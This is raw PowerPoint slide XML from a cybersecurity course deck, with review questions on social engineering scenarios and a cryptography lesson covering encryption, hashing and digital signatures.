                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0386536-BAC5-BB1A-2B7C-5056A4AD0AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brand Impersonation and Disinformation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watering Hole Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="767024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75CA7-021E-D3B0-E656-7130F6FA20EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Social Engineering</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AEB3C9E-FC12-73D2-83B7-C5AD185DFA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The help desk takes a call, and the caller states that she cannot connect to the e-commerce website to check her order status. She would also like a username and password. The user gives a valid customer company name but is not listed as a contact in the customer database. The user does not know the correct company code or customer ID. Is this likely to be a social engineering attempt, or is it a false alarm?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A purchasing manager is browsing a list of products on a vendor’s website when a window opens claiming that antimalware software has detected several thousand files on their computer that are infected with viruses. Instructions in the official-looking window indicate the user should click a link to install software that will remove these infections. What type of social engineering attempt is this, or is it a false alarm?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your CEO calls to request market research data immediately be forwarded to their personal email address. You recognize their voice, but a proper request form has not been filled out and use of third-party email is prohibited. They state that normally they would fill out the form and should not be an exception, but they urgently need the data to prepare for a roundtable at a conference they are attending. What type of social engineering techniques could this use, or is it a false alarm?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A company policy states that any wire transfer above a certain value must be authorized by two employees, who must separately perform due diligence to verify invoice details. What specific type of social engineering is this policy designed to mitigate?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4173069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69DF9-CC14-F0D7-E24B-41901595606B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 2 - Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7880DE5A-B6F5-9CD3-B947-85C4F729760A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Guidelines for Comparing Threat Actors and Attack Surfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Follow these guidelines when you assess the use of threat research and analysis:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Create a profile of threat actor types that pose the most likely threats to your business. Remember that you may be targeted as the supplier to a larger enterprise.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use analysis of business workflows and asset inventories to identify the organization’s attack surface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use research to extend understanding of the attack surface into specific threat vectors such as vulnerable software, unsecure networks, supply chain, and message-based attacks and lures that target the human vector.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2950798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377A-1EC3-C0D4-90C7-4CB4186D27EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 3 - Explain Cryptographic Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FCA39C-2BA9-AEB3-ABE6-4DE459AB1E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Lesson Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Compare and contrast cryptographic algorithms.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Explain the importance of public key infrastructure and digital certificates.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Explain the importance of using appropriate cryptographic solutions for encryption and key exchange.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3560117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32835-1C0B-5965-8420-DCDE03EAAEAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 3A - Cryptographic Algorithms</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14553184-D53E-24CE-8183-0244A8AF804F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336872"/>
            <a:ext cx="10635379" cy="4368727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Cryptographic Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Cryptography, which literally means “secret writing,” is the art of making information secure by encoding it. This is the opposite of security through obscurity. Security through obscurity means keeping something a secret by hiding it. This is considered impossible (or at least high risk) on a computer system. With cryptography, it does not matter if third parties know of the existence and location of the secret, because they can never understand what it is without the means to decode it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The following terminology is used to discuss cryptography:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Plaintext (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>)—is an unencrypted message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ciphertext—is an encrypted message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Algorithm—is the process used to encrypt and decrypt a message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Cryptanalysis—is the art of cracking cryptographic systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3607388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67BDE-1CE9-6373-4DA4-8C22D2B1F5C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Symmetric Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07DDB26E-F85F-0CE6-5A28-3447DCBB955A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703785" y="2336800"/>
            <a:ext cx="9430815" cy="4356100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2827795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33EA-9B93-D708-B7B3-49BB4C9D29FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F78222B-752F-A508-99E8-111118CE1DB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="863600" y="2336800"/>
            <a:ext cx="9055099" cy="4434591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3044965571"/>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30EF7-E053-90C6-981E-0713DAA4FFB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hashing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 159">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40DA2407-6460-8842-2757-18A0AFF566AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="2125430"/>
            <a:ext cx="9746379" cy="3132370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09CBA7C2-8BB2-F975-0150-3935C3EE8651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258887" y="5407404"/>
            <a:ext cx="7935913" cy="1394735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497556128"/>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56C8-7EEF-1287-DD9D-CC59F3ABF947}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Digital Signatures</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B70D90C7-EBC4-93CF-E1EB-A76FD6D3AD1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128658" y="2184400"/>
            <a:ext cx="5249792" cy="3920371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 162">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE10CA1-E00D-E108-A7FC-36512713FD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594349" y="2057400"/>
            <a:ext cx="6100281" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349291279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393A8-ECF2-8464-697E-55B9B293E69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="667657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cybersecurity Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="4000" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E474B15-E861-1B73-06BF-73CAA899AF23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723410" y="1440934"/>
            <a:ext cx="8973086" cy="5136926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36104536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CA54E1-97F4-A82B-639A-B182C90C6975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Activity:Cryptographic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Algorithms</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395C9443-F311-883B-3070-7BB9C3AE93CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which part of a simple cryptographic system must be kept secret—the cipher, the ciphertext, or the key?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Considering that cryptographic hashing is one way and the digest cannot be reversed, what makes hashing a useful security technique?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which security property is assured by symmetric encryption?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are the properties of a public/private key pair?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the process of digitally signing a message?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33855588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8E3B9-0437-8DCA-DE7F-8C11C2024D1A}"/>
